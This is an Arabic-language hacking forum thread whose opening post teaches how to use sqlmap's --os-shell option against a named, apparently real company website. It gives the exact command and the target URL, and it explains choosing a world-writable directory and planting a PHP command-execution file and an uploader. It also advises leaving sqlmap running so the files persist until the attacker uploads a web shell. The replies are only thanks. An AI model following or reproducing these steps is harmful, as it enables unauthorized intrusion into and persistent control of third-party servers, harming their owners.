• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع Mr.7nsh
  • تاريخ البدء
Developer

  • إنضم
    7 مارس 2013
    المشاركات
    64
    الإعجابات
    15
    النقاط
    30
    نظام التشغيل
    windows_xp
    اللغة البرمجية
    python
    التوجّه
    white_hat
    برنامج الحماية ؟
    avg
    المتصفح
    firefox
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 15
#1

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيفكم اخواني ان شاء الله بألف خير

ندخل في الموضوع على طوول




معانا موضوع عن اداة sqlmap في نظام كالي لينكس

الكل يعرف الاداه انها للحقن في ثغرات sql لكن البعض مايعرف

ان ممكن من الاداه ترفع شل وتاخذ راحتك في السيرفر نجي للمهم

لازم نعرف مسار مجلد عليه تصريح 777 او اذا كان السيرفر صلاحياته يوزر حدد المسار اللي يعجبك

واهم حاجه بعد الحقن لازم ماتقفل الsqlmap لين ماترفع

شل لان بيحذف الملفات تلقائي اللي تم حقنها في الموقع نتابع ونشوف

عندنا الان هذا الموقع

[CODEE]http://www.microtekusa.com/products.php?KindID=6[/CODEE]


نكتب هذا الامر في الترمنال


[CODEE]sqlmap -u http://www.microtekusa.com/products.php?KindID=6 --os-shell[/CODEE]

تابع معي الشرح المصور



يطلع لنا هذا الشكل ونختار [4] PHP (default) بكتابة الرقم 4 مثل الصوره وانتر

كتبنا رقم 4 لان الموقع يدعم PHP كل موقع وعلى حسب البرمجه اللي شغال عليها الموقع



الصوره الثالثه هنا تطلع لنا خيارات الاول المسار

الافتراضي والثاني المسار اللي انت تحدده يحقن فيه الملف وانا افضل

المسار الثاني علشان اختار المجلد اللي يكون مصرح في اغلب

الحالات نكتب رقم 2 وانتر وشوف وش بيطلع لك



في هالصوره الحين لازم نكتب مسار المجلد

اللي راح يحقن فيه الملف المطلوب وانا حددت مسار

مصرح بعد التخمين على مجلدات الموقع





في هذي الصوره الان يقولك تم الحقن بنجاح

وهنا الخلاصه تم حقن ملفين الملف الاول هذا هو

tmpbxgbe.php?cmd=ls -la

والملف الثاني ابلود

tmpunqmq.php

ملاحظه مهمه جدا :: شوف اخر شي بعد ماتم حقن الملفين وش مكتوب

calling OS shell. To quit type 'x' or 'q' and press ENTER

يعني اذا تم كتابة حرف X او حرق q راح يتم حذف الملفين

تلقائي وبكذا بعض الشباب راح يقول ماينفع الموقع لم يتم الحقن لازم

تخليه مثل ماهو من غير ماتكتب اي شي لين ماترفع الشل

الخاص فيك في الموقع وبعدها اكتب اللي تبي في الترمنال






 


DeveloPer Plus

  • إنضم
    22 نوفمبر 2012
    المشاركات
    112
    الإعجابات
    0
    النقاط
    50
    التوجّه
    white_hat
    برنامج الحماية ؟
    kaspersky
    المتصفح
    opera
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#2
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

بارك الله فيك أخي الكريم ماقصرت​
 


Developer

  • إنضم
    16 ديسمبر 2011
    المشاركات
    35
    الإعجابات
    5
    النقاط
    30
    برنامج الحماية ؟
    mcafee
    الإقامة
    {عقلية DZ}
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 5
#3
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

بارك الله فيك أخي الفاضل

و يعطيك الصحة
 


V • I • P

  • إنضم
    3 أغسطس 2014
    المشاركات
    695
    الإعجابات
    1,241
    النقاط
    515
    آخر نشاط
  • لم يكتشف اي تلغيمه


  • النقاط المتوفره 515
    رصيدي البنكي الحالي ( 0 )
    المستوى 1K
#4
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

رائع اخي بارك الله فيك !
 


Developer

  • إنضم
    5 نوفمبر 2012
    المشاركات
    42
    الإعجابات
    10
    النقاط
    15
    التوجّه
    black_hat
    برنامج الحماية ؟
    avast
    المتصفح
    firefox
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 15
    رصيدي البنكي الحالي ( 0 )
    المستوى 10
#5
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

وعليكم السلام

مشاء الله شرح واضح وكافي يالغالي

مآقصرت
 


Developer

  • إنضم
    19 ديسمبر 2011
    المشاركات
    71
    الإعجابات
    7
    النقاط
    30
    العمر
    29
    نظام التشغيل
    windows_8_1
    اللغة البرمجية
    visual_basic
    التوجّه
    none_hat
    برنامج الحماية ؟
    avast
    المتصفح
    firefox
    الإقامة
    TuNiSiA
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 7
#6
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

شكراً جزيلاً اخي ..

بارك الله فيك و جزاك الله خيراً .. :{2}:
 


موقوف لمخالفة الشروط

  • إنضم
    26 مايو 2014
    المشاركات
    54
    الإعجابات
    2
    النقاط
    30
    نظام التشغيل
    windows_7
    اللغة البرمجية
    perl
    التوجّه
    white_hat
    برنامج الحماية ؟
    avast
    المتصفح
    firefox
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 2
#7
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

عاشت ايدك حبي شرح حلو
 


Developer

  • إنضم
    29 مايو 2012
    المشاركات
    40
    الإعجابات
    0
    النقاط
    30
    برنامج الحماية ؟
    mcafee
    الإقامة
    iran
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#8
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

يعطيك آلعآفيه..~!

آستمرِ..~!
 


Developer

  • إنضم
    26 ديسمبر 2011
    المشاركات
    51
    الإعجابات
    4
    النقاط
    30
    العمر
    31
    نظام التشغيل
    linux
    برنامج الحماية ؟
    avira
    الإقامة
    ©MAЯΘ
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 4
#9
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

السلام عليكم
بارك الله فيك أخي
لا هنت أخي :{2}:
 


Developer

  • إنضم
    20 أبريل 2012
    المشاركات
    66
    الإعجابات
    2
    النقاط
    30
    برنامج الحماية ؟
    armor2net
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 2
#10
رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

يعطيك العافية على الموضوع ,

واصل يا مبدع
 


حقن الموقع بشل ابلود  عن طريق لـ  Injection site shell Upload sqlmap
الوسوم - Tag الوسوم - Tag